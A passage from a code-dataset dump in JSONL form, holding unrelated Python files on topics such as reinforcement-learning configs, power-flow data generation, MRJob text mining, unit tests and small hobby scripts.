summary[\"number_of_PTMs\"],summary[\"number_of_sequence_varients\"],\n summary[\"number_of_splice_varients\"],\n )\n return string_rep\n\n def __repr__(self)->str: \n \"\"\"\n :return: A formated print statement for the class \n :rtype: str\n \"\"\"\n return str(self)\n ","sub_path":"library/IPTK/Classes/Features.py","file_name":"Features.py","file_ext":"py","file_size_in_byte":30284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"410484465","text":"import os\r\nimport re\r\nimport math\r\nfrom collections import deque\r\nimport heapq\r\nimport time\r\n\r\n\r\ndef gcd(a, b):\r\n if b == 0:\r\n return a\r\n else:\r\n return gcd(b, a % b)\r\n\r\n\r\ndef func(p, q):\r\n m = gcd(p, q)\r\n p, q = int(p / m), int(q / m)\r\n if int(math.pow(2, int(math.log2(q)))) != q:\r\n return -1\r\n ans = 0\r\n while (q >> 1) > 0:\r\n if p >= q:\r\n break\r\n else:\r\n ans += 1\r\n q = (q >> 1)\r\n return ans\r\n\r\n# def function():\r\n# return False\r\n\r\n\r\ndef main(fin, fout):\r\n start = time.clock()\r\n fin = open(fin, 'r')\r\n fout = open(fout, 'w')\r\n k = int(fin.readline())\r\n for i in range(k):\r\n p, q = [int(w) for w in fin.readline().split('/')]\r\n ans = func(p, q)\r\n\r\n fout.write('Case #' + str(i + 1) + ': ')\r\n if ans == -1:\r\n fout.write('impossible' + '\\n')\r\n else:\r\n fout.write(str(ans) + '\\n')\r\n\r\n if i % 10 == 9:\r\n print('Case #' + str(i + 1) + '/' + str(k) + ' ' + 'finished, %.3f' % (time.clock() - start) + ' sec taken')\r\n\r\n fin.close()\r\n fout.close()\r\n pass\r\n\r\nif __name__ == '__main__':\r\n problem = 'A'\r\n _fin = problem + '/A-large.in'\r\n _fout = _fin[:-2] + 'out'\r\n main(_fin, _fout)\r\n","sub_path":"solutions_5706278382862336_1/Python/lliquid/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227035398","text":"import unittest\nimport props\nfrom google.appengine.ext import testbed\nfrom summoner_api_client import SummonerAPIClient\n\nclass SummonerAPIClientTest(unittest.TestCase):\n \"\"\"Test for Summoner API Client\"\"\"\n\n def setUp(self):\n \"\"\"Init client for test\"\"\"\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n self.testbed.init_urlfetch_stub()\n self.client = SummonerAPIClient(\"oce\", props.get_config().lol_api_key)\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def test_by_name(self):\n \"\"\"Test fetch by summoner name\"\"\"\n summoner = self.client.by_name(\"Minicat\")\n self.assertEquals(summoner.name, \"Minicat\")\n self.assertEquals(summoner.summonerLevel, 30)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"server/api/lol/raw_client/summoner_api_client_test.py","file_name":"summoner_api_client_test.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"564828249","text":"from collections import defaultdict\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn\n\nocc_counts = defaultdict(int)\nmulti = True\n\nif multi:\n train_txt = '../annotations/train_anns_new.csv'\nelse:\n AP_txt = '../annotations/train_anns_new.csv'\n\n\nif multi:\n AP_txt = './csv_retinanet_1_02_multi.txt'\nelse:\n AP_txt = './csv_retinanet_12_35_thresh.txt'\n\n\nwith open(multi) as f:\n for line in f:\n seen = set()\n category = line.split(',')[-1].split('\\n')[0]\n occ_counts[category] += 1\n seen.add(category)\n if multi:\n category2 = line.split(',')[-2]\n if category2 != 'None' and category2 not in seen:\n occ_counts[category2] += 1\n seen.add(category2)\n category3 = line.split(',')[-3]\n if category3 != 'None' and category3 not in seen:\n occ_counts[category3] += 1\n\n\nbody_parts = ['n05564590_hand', 'n05563770_arm', 'n05216365_body', 'n05600637_face', 'n05538625_head', 'n05566504_finger', 'n05254795_hair', 'n05560787_leg', 'n05302499_mouth', 'n05305806_lip']\nword_with_synonyms = ['n14844693_soil', 'n01320872_female', 'n09225146_body_of_water']\n\n\nAPs = []\noccurances = []\ncolors = []\nwith open(AP_txt) as f:\n for line in f:\n category, AP = line.split(',')\n if occ_counts[category] < 5000:\n if category in body_parts:\n colors.append('green')\n elif category in word_with_synonyms:\n colors.append('blue')\n else:\n colors.append('red')\n APs.append(float(AP))\n occurances.append(occ_counts[category])\n\nprint(min(occurances))\n\nseaborn.regplot(occurances, APs, n_boot=100, robust=True)\nplt.scatter(occurances, APs, color=colors)\nplt.show()\n\n\n\n\n","sub_path":"data_visualization/training_v_AP.py","file_name":"training_v_AP.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"359610001","text":"import unittest\nimport unittest.mock as mock\nimport re\nfrom fints2ledger.ledger_converter import LedgerConverter\nfrom fints2ledger.ledger_converter import fill\nfrom fints2ledger.ledger_converter import print_transaction\nfrom fints2ledger.ledger_converter import get_remaining_prompts_from_prefill\n\n\nclass LedgerConverterTest(unittest.TestCase):\n def setUp(self):\n config = {\"ledger\": {\"md5\": [\"date\", \"payee\", \"purpose\", \"amount\"]}}\n self.writer = LedgerConverter(config)\n\n def test_write_to_ledger(self):\n expected_entry = \"\"\"\\\n2018/03/19 someone some kind of credit some description\n ; md5sum: e7224d45e6102ad5cb5fc7587ffee349\n test:debit EUR 535.0\n test:credit EUR -535.0\n\"\"\"\n data = {\n \"date\": \"2018/03/19\",\n \"amount\": \"535\",\n \"currency\": \"EUR\",\n \"payee\": \"someone\",\n \"posting\": \"some kind of credit\",\n \"purpose\": \"some description\",\n \"debit_account\": \"test:debit\",\n \"credit_account\": \"test:credit\"\n }\n\n actual_entry = self.writer.journal_entry(data)\n\n self.assertEquals(expected_entry, actual_entry)\n\n def test_missing_autocomplete_file(self):\n with mock.patch(\"fints2ledger.ledger_converter.input\", return_value=\"some entry\", create=True):\n try:\n self.writer.prompt_for_input(\"inputPromptWithoutFile\")\n except KeyError:\n pass\n else:\n return\n self.fail(\n \"prompt_for_input shouldn't raise error when prompting for input without a matching autocomplete file.\")\n\n def test_should_fill_when_regex_matches(self):\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*SUPERMARKET.*\"},\n \"fill\": {\"credit_account\": \"expenses:daily:groceries\"}\n }\n ]\n transaction = {\n \"date\": \"2018/03/19\",\n \"amount\": \"535\",\n \"currency\": \"EUR\",\n \"payee\": \"someone\",\n \"posting\": \"some kind of credit\",\n \"purpose\": \"Thank you for your purchase at SUPERMARKET\",\n }\n\n result = fill(transaction, prefill_config)\n\n self.assertEquals(\n result, {\"credit_account\": \"expenses:daily:groceries\"})\n\n def test_should_not_fill_None_values(self):\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*SUPERMARKET.*\"},\n \"fill\": {\"credit_account\": \"expenses:daily:groceries\", \"purpose\": None}\n }\n ]\n transaction = {\n \"date\": \"2018/03/19\",\n \"amount\": \"535\",\n \"currency\": \"EUR\",\n \"payee\": \"someone\",\n \"posting\": \"some kind of credit\",\n \"purpose\": \"Thank you for your purchase at SUPERMARKET\",\n }\n\n result = fill(transaction, prefill_config)\n\n self.assertEquals(\n result, {\"credit_account\": \"expenses:daily:groceries\"})\n\n def test_should_only_fill_when_all_matches_match(self):\n credit_account_key = \"credit_account\"\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*VACATION.*\", \"payee\": \"vacation_company\"},\n \"fill\": {credit_account_key: \"expenses:vacation\"}\n }\n ]\n matching_transaction = {\n \"payee\": \"vacation_company\",\n \"purpose\": \"VACATION on an island\",\n }\n other_transaction = {\n \"payee\": \"spouse\",\n \"purpose\": \"VACATION on an island\",\n }\n\n matching_result = fill(matching_transaction, prefill_config)\n other_result = fill(other_transaction, prefill_config)\n\n self.assertEquals(matching_result, {\n \"credit_account\": \"expenses:vacation\"})\n self.assertEquals(other_result, {})\n \n def test_should_list_None_prefills_as_remaining_prompts(self):\n credit_account_key = \"credit_account\"\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*VACATION.*\", \"payee\": \"vacation_company\"},\n \"fill\": {credit_account_key: \"expenses:vacation\", \"purpose\": None}\n }\n ]\n transaction = {\n \"payee\": \"vacation_company\",\n \"purpose\": \"VACATION on an island\",\n }\n\n self.assertEquals(get_remaining_prompts_from_prefill(transaction, prefill_config), [\"purpose\"])\n\n \n def test_should_return_None_if_transaction_is_not_matching(self):\n credit_account_key = \"credit_account\"\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*SUPERMARKET.*\", \"payee\": \"vacation_company\"},\n \"fill\": {credit_account_key: \"expenses:vacation\", \"purpose\": None}\n }\n ]\n transaction = {\n \"payee\": \"vacation_company\",\n \"purpose\": \"VACATION on an island\",\n }\n\n self.assertEquals(get_remaining_prompts_from_prefill(transaction, prefill_config), None)\n\n\n @mock.patch(\"fints2ledger.ledger_converter.print\")\n def test_prints_transaction_in_uncidoe(self, mock_print):\n print_transaction({\n \"purpose\": \"😀\"\n })\n self.assertIn(\"😀\", mock_print.call_args_list[0][0][0])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"fints2ledger/test/test_ledger_converter.py","file_name":"test_ledger_converter.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"637868816","text":"def countdown(i):\n print(i)\n if i < 1:\n return\n else:\n countdown(i - 1)\n\n\ndef greet(name):\n print(\"Hello,\" + name + \"!\")\n greet2(name)\n print(\"getting ready to say bye...\")\n bye()\n\n\ndef greet2(name):\n print(\"how are you,%s?\" % name)\n\n\ndef bye():\n print(\"ok bye!\")\n\n\n# greet(\"maggie\")\n\n# 汉诺塔\ndef move(n, a, b, c):\n global i\n i += 1\n if n == 1:\n print(a, \"-->\", c)\n\n else:\n move(n-1, a, c, b)\n print(a, \"-->\", c)\n move(n-1, b, a, c)\n\n\ni = 0\nmove(3, 'a', 'b', 'c')\nprint(i)\n","sub_path":"others/3.1 递归.py","file_name":"3.1 递归.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"458621620","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\n\n\ndef train_baseline(train_data, epochs, model, optimizer, criterion):\n for epoch in range(epochs): # loop over the dataset multiple times\n print(epoch)\n for i in range(len(train_data)):\n # get the inputs; data is a list of [inputs, labels]\n data = train_data[i]\n inputs = data['image'].unsqueeze(0)\n classes = data['class'].unsqueeze(0).unsqueeze(0)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model(inputs)\n loss = criterion(outputs, classes)\n loss.backward()\n optimizer.step()\n\n print('Finished Training')\n return model","sub_path":"Train_Utils/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"99674955","text":"import os, json\nimport pickle\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nimport numpy as np\nimport gym\n\ndef save_params(path, params):\n '''Saves parametes to the path as json\n creates a desired folder if it not exists\n prints out the path upon completion\n '''\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(path, 'w') as out:\n out.write(json.dumps(params, separators=(',\\n','\\t:\\t'), sort_keys=True))\n print ('Data saved to ' + path)\n\ndef rollout(policy_fn, env, max_steps = 1000, render = False):\n '''Rolls out a policy on an environment until copletion of the episode\n returns : observations, actions, total reward\n '''\n observations, actions = [],[]\n obs = env.reset()\n done = False\n totalr = 0.\n steps = 0\n while not done:\n action = policy_fn(obs[None,:])\n observations.append(obs)\n actions.append(action)\n obs, r, done, _ = env.step(action)\n totalr += r\n steps += 1\n if render:\n env.render()\n if steps >= max_steps:\n break\n\n return np.array(observations).reshape(len(observations),-1), np.array(actions).reshape(len(actions),-1), totalr\n\ndef train_model(hidden_size, obs, act, patience, model = None):\n '''\n Trains a model of 2 layer of specified size\n on provided observation-action samples with\n given the patience of early stopping\n each epoch will contain 20k samples(created by repeating)\n returns model and some training data\n '''\n if not model:\n model = tf.keras.Sequential([\n layers.Dense(hidden_size, activation='sigmoid', input_shape=(obs.shape[1],)),\n layers.Dense(hidden_size, activation='sigmoid'),\n layers.Dense(act.shape[1])])\n\n model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.001),\n loss='mse',\n metrics=['mse'])\n\n es = tf.keras.callbacks.EarlyStopping(patience=patience, monitor='loss')\n\n dataset = tf.data.Dataset.from_tensor_slices((obs, act))\n dataset = dataset.repeat()\n dataset = dataset.shuffle(buffer_size=500)\n dataset = dataset.batch(32)\n \n history = model.fit(dataset, epochs=1000, steps_per_epoch=625, callbacks=[es])\n\n training_data = dict(hidden_size = hidden_size, epochs = es.stopped_epoch, mse = history.history['loss'][-1], patience = patience)\n\n return model, training_data\n\n\ndef test_model(model, env , num_rollouts = 20, max_steps = 1000):\n '''\n Tests model on an environment for the specified number\n of rollouts and returns the test results\n '''\n returns = []\n obs_set = []\n act_set = []\n for i in range(num_rollouts):\n print('Rollout ', i+1)\n o, a, totalr = rollout(model.predict, env, max_steps)\n returns.append(totalr)\n\n print('mean return', np.mean(returns))\n print('std of return', np.std(returns))\n\n test_data = dict(Returns = returns)\n \n return test_data \n \n\nif __name__ == '__main__':\n\n ### This code will train the Behavioral Cloning agent on the expert data\n ### And test it for the provided number of runs. Data will be saved in\n ### BC_models folder\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('envname', type=str)\n parser.add_argument('hidden_size', type = int, default = 256)\n parser.add_argument('--patience', type=int, default=3,\n help='Patience of early stopping. Default = 3')\n parser.add_argument('--num_tests', type=int, default=20,\n help='Number test runs of the learned policy. Default = 20')\n args = parser.parse_args()\n\n # Getting the expert policy samples\n with open(os.path.join('expert_data', args.envname + '.pkl'), 'rb') as f:\n expert_data = pickle.load(f)\n obs, act = expert_data.values()\n obs, act = obs.reshape(len(obs), -1) , act.reshape(len(act), -1)\n\n model_path = os.path.join('BC_models', args.envname+ '_' + str(args.hidden_size)+'.h5')\n data_path = os.path.join('BC_models', args.envname+ '_' + str(args.hidden_size)+'.json')\n\n model, training_data = train_model(args.hidden_size, obs, act, args.patience)\n training_data[\"model_path\"] = model_path\n\n if args.num_tests:\n env = gym.make(args.envname)\n test_data = test_model(model, env, num_rollouts = args.num_tests)\n training_data.update(test_data)\n\n save_params(data_path, training_data)\n model.save(model_path)\n\n\n\n\n\n","sub_path":"hw1/BC.py","file_name":"BC.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62568981","text":"#Python HW 1, problem 2, min max calc\n\n\n\nnumInputs = int(input())\n\nfor inputInd in range(numInputs):\n currentInput = (input())#read input line\n currentInput = currentInput.split(' ')#split to a list by the spaces\n currentNumbers = [int(i) for i in currentInput]#covert strings to ints\n currMax = currentNumbers[0]\n currMin = currentNumbers[0]\n for num in currentNumbers:\n if (num > currMax ):\n currMax = num\n if (num None:\n if override_dict:\n for key, value in override_dict.items():\n if not hasattr(self, key):\n raise KeyError(\"unknown argument\")\n setattr(self, key, value)\n self._post_init_processing()\n return\n\n def _post_init_processing(self) -> None:\n self.game_name = self.game.__name__.split('.')[-1]\n self.game_type = self.game.__name__.split('.')[-2]\n if not self.use_latent_embedding and self.train_setting == 'implicit_ensemble':\n for i in range(10):\n print('----------------------------------------')\n print('Warning: config line 60, gaussian latent noise not used !!!!!')\n print('----------------------------------------')\n\ndef is_adversary(agent_id: str) -> bool:\n return (('adversary' in agent_id)\n or agent_id.startswith('eve')\n or agent_id.startswith('player_1')\n or ('second' in agent_id))\n\ndef get_config(args: Args):\n # num_rollouts = 2\n ModelCatalog.register_custom_model(\"SoftModularActorCriticNet\", SoftModularActorCriticNet)\n ModelCatalog.register_custom_model(\"SimpleEnsembleActorCriticNet\", SimpleEnsembleActorCriticNet)\n # 1. Gets default training configuration and specifies the POMgame to load.\n config = deepcopy(get_agent_class(args.alg_name)._default_config)\n\n # 2. Set environment config. This will be passed to\n # the env_creator function via the register env lambda below.\n # local_ratio specify hthe ratio between global reward and the local reward\n # config[\"env_config\"] = {\"local_ratio\": 0.5}\n def env_creator():\n if args.game.__package__.endswith('atari'):\n if (args.game_name.startswith('foozpong') or\n args.game_name.startswith('basketball_pong') or\n args.game_name.startswith('volleyball_pong')\n ):\n env = args.game.env(obs_type=args.atari_obs_type,\n max_cycles=args.max_steps['atari'],\n full_action_space=False,\n num_players=2)\n else:\n env = args.game.env(obs_type=args.atari_obs_type,\n full_action_space=False,\n max_cycles=args.max_steps['atari'])\n env = frame_skip_v0(env, args.atari_frame_skip_num)\n env = frame_stack_v1(env, args.atari_frame_stack_num)\n\n else:\n env = args.game.env()\n if args.game_name.startswith('rps'):\n env = one_hot_obs_wrapper(env)\n env = dtype_v0(env, dtype=float32)\n env = pad_observations_v0(env)\n env = pad_action_space_v0(env)\n if args.game_name.startswith('connect_four') or args.game_name.startswith('tictactoe'):\n env = FlattenEnvWrapper(env)\n GAUSSIAN_STD = 1.0\n assert abs(GAUSSIAN_STD - 1.0) < 1e-5, \"must be 1.0, otherwise simple ensemble implementation is wrong\"\n env = LatentGaussianAugmentedEnvWrapper(env,\n latent_parameter_dim=args.latent_para_dim,\n gaussian_std=1.0,\n use_dict_obs_space=args.use_dict_obs_space)\n return env\n\n # 3. Register env, and get trainer_class\n register_env(args.game_name,\n lambda config: PettingZooEnv(env_creator()))\n trainer_class = get_agent_class(args.alg_name)\n\n # 4. Extract space dimensions\n test_env = PettingZooEnv(env_creator())\n obs_space = test_env.observation_space\n act_space = test_env.action_space\n agents_id = test_env.agents\n print(f\"obs_space: {obs_space}; act_space: {act_space}\")\n\n # 5. Configuration for multiagent setup:\n config[\"framework\"] = \"torch\"\n config[\"num_gpus\"] = 0\n config[\"log_level\"] = \"INFO\"\n config[\"num_workers\"] = args.num_cpus // 2\n config[\"num_cpus_per_worker\"] = 1\n config['num_envs_per_worker'] = 5\n # Fragment length, collected at once from each worker and for each agent!\n config[\"rollout_fragment_length\"] = 100\n # Training batch size -> Fragments are concatenated up to this point.\n config[\"train_batch_size\"] = 2000\n config[\"sgd_minibatch_size\"] = 256\n config[\"entropy_coeff\"] = 0.01\n config[\"lambda\"] = 0.9\n config[\"vf_clip_param\"] = 50\n config[\"num_sgd_iter\"] = 10\n # After n steps, force reset simulation\n config[\"horizon\"] = args.max_steps[args.game_type]\n # Default: False\n config[\"no_done_at_end\"] = False\n # Info: If False, each agents trajectory is expected to have\n # maximum one done=True in the last step of the trajectory.\n # If no_done_at_end = True, environment is not resetted\n # when dones[__all__]= True.\n config['ignore_worker_failures'] = True\n\n def get_main_and_test_config(config: Dict[str, Any]) -> Tuple[Dict[str, Any],\n Dict[str, Any]]:\n\n main_policies = {}\n for i, agent_id in enumerate(agents_id):\n for j in range(1):\n main_policies[f'{agent_id}_{j}'] = (PPOTorchPolicy,\n obs_space,\n act_space,\n {\"framework\": \"torch\"})\n test_policies = {\n 'test_' + agent_id: (PPOTorchPolicy, obs_space, act_space, {\"framework\": \"torch\"})\n for agent_id in agents_id if is_adversary(agent_id)\n }\n policies = {**main_policies, **test_policies}\n\n main_config, test_config = deepcopy(config), deepcopy(config)\n\n main_config[\"multiagent\"] = {\n \"policies\": policies,\n \"policy_mapping_fn\": lambda agent_id: f'{agent_id}_{0}',\n \"policies_to_train\": list(main_policies.keys())\n }\n\n def test_config_policy_mapping(agent_id: str) -> str:\n if is_adversary(agent_id):\n return 'test_' + agent_id\n return f'{agent_id}_{0}'\n\n test_config[\"multiagent\"] = {\n \"policies\": policies,\n \"policy_mapping_fn\": test_config_policy_mapping,\n \"policies_to_train\": list(test_policies.keys())\n }\n return main_config, test_config\n\n def get_simple_ensemble_training_config(config: Dict[str, Any], ensemble_size: int=3) -> Tuple[Dict[str, Any],\n Dict[str, Any]]:\n if ensemble_size > 1:\n config[\"model\"] = {\n \"custom_model\": \"SimpleEnsembleActorCriticNet\",\n \"custom_model_config\": {\n \"use_dict_obs_space\": args.use_dict_obs_space,\n 'ensemble_size': ensemble_size\n }\n }\n main_config, test_config = get_main_and_test_config(config)\n return main_config, test_config\n\n def get_implicit_ensemble_training_config(config: Dict[str, Any]) -> Tuple[Dict[str, Any],\n Dict[str, Any]]:\n config[\"model\"] = {\n \"custom_model\": \"SoftModularActorCriticNet\",\n \"custom_model_config\": {\n \"use_latent_embedding\": args.use_latent_embedding,\n \"use_dict_obs_space\": args.use_dict_obs_space,\n \"base_type\": MLPBase,\n \"em_input_shape\": args.latent_para_dim,\n \"emb_shaping_net_hidden_shapes\": args.emb_shaping_net_hidden_shapes,\n 'emb_shaping_net_last_softmax': args.emb_shaping_net_last_softmax,\n 'em_hidden_shapes': [args.soft_modular_net_hidden_dim,\n args.soft_modular_net_hidden_dim], #[400],\n 'hidden_shapes': [args.soft_modular_net_hidden_dim,\n args.soft_modular_net_hidden_dim], #[400, 400],\n 'num_layers': args.soft_modular_net_num_layers, #4,\n 'num_modules': args.soft_modular_net_num_modules, #4,\n 'module_hidden': args.soft_modular_net_hidden_dim, #128,\n 'gating_hidden': args.soft_modular_net_hidden_dim, #256,\n 'num_gating_layers': 2, #with 1 gating layer, 500 step works for simple_spread\n 'add_bn': False,\n }\n }\n main_config, test_config = get_main_and_test_config(config)\n return main_config, test_config\n\n if args.train_setting == 'single_policy':\n main_config, test_config = get_simple_ensemble_training_config(config, ensemble_size=1)\n elif args.train_setting == 'simple_ensemble':\n main_config, test_config = get_simple_ensemble_training_config(config, ensemble_size=3)\n else:\n assert args.train_setting == 'implicit_ensemble'\n main_config, test_config = get_implicit_ensemble_training_config(config)\n\n return trainer_class, test_env, main_config, test_config","sub_path":"IET_module/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"566544261","text":"\"\"\"\n@author: krakowiakpawel9@gmail.com\n@site: e-smartdata.org\n\"\"\"\n\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom nltk import pos_tag\n# import nltk\nimport re\n\n# nltk.download('stopwords')\n\n# $ python 04_top_20_common_adjective.py -r emr --num-core-instances 4 prep_reviews.tsv --output-dir=s3://big-data-hadoop/output/job3\n\nWORD_RE = re.compile(r\"[\\w]+\")\n\nlemmatizer = WordNetLemmatizer()\nstop_words = stopwords.words('english')\n\n\nclass MRFood(MRJob):\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper),\n MRStep(mapper=self.mapper_get_keys,\n reducer=self.reducer),\n MRStep(mapper=self.mapper_get_1_and_5,\n reducer=self.reducer_get_20_words)\n ]\n\n def mapper(self, _, line):\n (Id, ProductId, UserId, ProfileName, HelpfulnessNumerator, HelpfulnessDenominator,\n Score, Time, Summary, Text) = line.split('\\t')\n words = WORD_RE.findall(Text)\n words = filter(lambda word: len(word) > 1, words)\n words = map(str.lower, words)\n words = map(lemmatizer.lemmatize, words)\n words = filter(lambda word: word not in stop_words, words)\n for word in words:\n if pos_tag([word])[0][1] == 'JJ':\n yield Score, word\n\n def mapper_get_keys(self, key, value):\n yield (key, value), 1\n\n def reducer(self, key, values):\n yield key, sum(values)\n\n def mapper_get_1_and_5(self, key, value):\n if key[0] == '1':\n yield key[0], (key[1], value)\n if key[0] == '5':\n yield key[0], (key[1], value)\n\n def reducer_get_20_words(self, key, values):\n results = {}\n for value in values:\n results[value[0]] = value[1]\n sorted_results = sorted([(val, key) for key, val in results.items()], reverse=True)\n\n yield key, sorted_results[:20]\n\n\nif __name__ == '__main__':\n MRFood.run()\n","sub_path":"06_food_reviews/04_top_20_common_adjective.py","file_name":"04_top_20_common_adjective.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"495984582","text":"from pypower.api import case300, ppoption, runpf, printpf, runopf, case9\nfrom constants import *\nimport numpy as np\nimport os\nfrom data_utils import *\nfrom tqdm import tqdm\n# See http://rwl.github.io/PYPOWER/api/ for description of variables\n\n# To install pypower, see https://www.pypsa.org/doc/installation.html\n\nsave_dir = \"case300_data/\"\ntry:\n # Create target Directory\n os.mkdir(save_dir)\n print(\"Directory \" , save_dir , \" Created \") \nexcept FileExistsError:\n print(\"Directory \" , save_dir , \" already exists\")\n\nMAX_ITERS = 50000\n\nac_ppopt = ppoption(PF_ALG=2, VERBOSE=0, OUT_ALL= -1, OUT_SYS_SUM=False, OUT_BUS = False, OUT_BRANCH = False, OUT_GEN = False, PF_DC=False, OUT_ALL_LIM=0)\ndc_ppopt = ppoption(PF_ALG=2, VERBOSE=0, OUT_ALL= -1, OUT_SYS_SUM=False, OUT_BUS = False, OUT_BRANCH = False, OUT_GEN = False, PF_DC=True, OUT_ALL_LIM=0)\n\ni = 0\n\nwhile i < MAX_ITERS:\n if i % 100:\n print(\"Iter: %d/%d\" % (i, MAX_ITERS))\n ppc = case300()\n new_pd = ppc['bus'][:,PD]\n new_pd += (np.random.rand(len(new_pd))-0.5)*new_pd\n new_qd = ppc['bus'][:, QD]\n new_qd += (np.random.rand(len(new_qd))-0.5)*new_qd\n ppc['bus'][:,PD] = new_pd\n ppc['bus'][:,QD] = new_qd\n \n # Run AC Powerflow\n ac_result = runopf(ppc, ac_ppopt)\n ac_outfile = \"%s/ac_result_%d\" % (save_dir, i)\n \n # Check AC solved correctly\n if ac_result['success'] == False:\n continue\n\n # Run DC Powerflow\n dc_result = runopf(ppc, dc_ppopt)\n dc_outfile = \"%s/dc_result_%d\" % (save_dir, i)\n\n # Check DC solved correctly\n if dc_result['success'] == False:\n continue\n \n # Write to file\n np.save(dc_outfile, ac_result)\n np.save(ac_outfile, dc_result)\n i = i + 1\n\n\n","sub_path":"code/generate_data300.py","file_name":"generate_data300.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"85627539","text":"# mysite/routing.py\nfrom channels.auth import AuthMiddlewareStack\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nfrom django.urls import re_path\n#from cons import consumers \n\nwebsocket_urlpatterns = [\n re_path(r'ws/path/(?P\\w+)/$', consumers.basicConsumer),\n]\n\napplication = ProtocolTypeRouter({\n 'websocket': AuthMiddlewareStack(\n URLRouter(\n websocket_urlpatterns\n )\n ),\n})","sub_path":"backend_for_reference/src/backend/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"365410334","text":"import os\nimport time\nfrom datetime import datetime\nimport json\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nANM = []\n\nos.system(\"title ANM\")\n\n\ndef save():\n global ANM\n try:\n with open('ANM.json', 'w') as f:\n json.dump(ANM, f)\n except:\n pass\n\n\ndef load():\n global ANM\n try:\n with open('ANM.json', 'r') as f:\n ANM = json.load(f)\n except:\n ANM = []\n save()\n\ndef clear():\n os.system(\"cls\")\n\n\ndef StringSplitList(x,y):\n string=\"\"\n firstLoop = True\n for i in x:\n if firstLoop == True:\n string+=str(i)\n else:\n string+=str(y)+str(i)\n firstLoop = False\n return(string)\n\n\ndef StringifyList(x):\n nstr = \"\"\n for i in x:\n try:\n nstr = nstr+str(x[i])\n except:\n pass\n return(nstr)\n\n\ndef getDate():\n year = time.strftime(\"%Y\")\n day = time.strftime(\"%d\")\n month = time.strftime(\"%m\")\n return([year,month,day])\n\ndef view():\n if len(ANM) <= 0:\n print(\"Theres nothing to view!\")\n input()\n menu(\"start\")\n else:\n clear()\n for i in range(0,len(ANM)):\n firstIrit = True\n print(ANM[i][0])\n for y in ANM[i]:\n if firstIrit == True:\n firstIrit = False\n else:\n print(\" \"+str(y))\n input()\n menu(\"start\")\n\n\ndef add():\n global ANM\n clear()\n print(\"-\"*20)\n print(\"[1]: Add User\")\n print(\"[2]: Add Entry\")\n print(\"[3]: Return\")\n print(\"-\"*20)\n choice = input(\"[]>\")\n try:\n choice = int(choice)\n except:\n add()\n\n if choice == 2:\n if len(ANM) <= 0:\n print(\"Theres nothing to add to!\")\n input()\n add()\n print(\"-\"*20)\n for i in range(0,len(ANM)):\n print(\"[\"+str(i+1)+\"]: \"+ANM[i][0])\n print(\"-\"*20)\n Pog = input(\"Select A Pog: \")\n try:\n Pog = int(Pog)\n except:\n add()\n Pog = Pog-1\n clear()\n print(\"-\"*20)\n print(\"Follow This Format: 10,20\")\n print(\"-\"*20)\n entry = input(\"Enter a new entry: \")\n entry = entry.split(\",\")\n if len(entry) <= 0:\n add()\n elif len(entry) > 2:\n add()\n try:\n int(entry[0])\n int(entry[1])\n except:\n add()\n date = getDate()\n date = StringSplitList(date,\"/\")\n entry.append(date)\n ANM[Pog].append(entry)\n save()\n print(\"Finished!\")\n input()\n add()\n elif choice == 1:\n clear()\n print(\"-\"*20)\n print(\"Enter A Name: \")\n print(\"-\"*20)\n inpuut = input(\"[]> \")\n ANM.append([str(inpuut)])\n print(\"Pog Added.\")\n input()\n add()\n elif choice == 3:\n menu(\"start\")\n else:\n add()\n\n\ndef editUser():\n load()\n clear()\n if len(ANM) <= 0:\n print(\"Theres no data!\")\n input()\n menu(\"start\")\n else:\n print(\"-\"*20)\n 